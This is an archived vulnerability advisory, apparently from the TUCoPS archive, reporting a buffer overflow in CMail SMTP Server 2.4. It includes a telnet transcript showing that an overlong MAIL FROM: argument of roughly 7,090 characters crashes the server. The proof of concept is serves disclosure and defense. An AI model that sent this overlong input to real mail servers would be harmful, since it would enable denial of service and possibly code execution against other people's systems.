Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: cmail-~1.txt

CMail SMTP Server Remotely Exploitable Buffer Overflow

CMail SMTP Server
Version 2.4: 
              Remotely exploitable buffer overflow

CMail SMTP Server Version 2.4 Problem:  We found a buffer overflow in
the CMail SMTP service (long MAIL FROM:)  that may allow an attacker to
execute arbitrary code on the target server, it is based on the eEye
pointed out overflows in cmail 2.3 >:-] Which was never fixed... 
software vendors still not taking security issues seriously.


[cham@guilt cham]$ telnet 25 Trying
Connected to Escape character is '^]'.
220 SMTP services ready. Computalynx CMail Server Version: 2.4
helo ussr
250 Hello ussr [yourip], how are you today? 
MAIL FROM: cmail<[buffer]> 
Where [buffer] is aprox. 7090 characters.
At his point the server overflows and crashes. 

Just a typical buffer overflow that should
have been fixed in version 2.3 when it was pointed out to them.

Luck Martins 

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH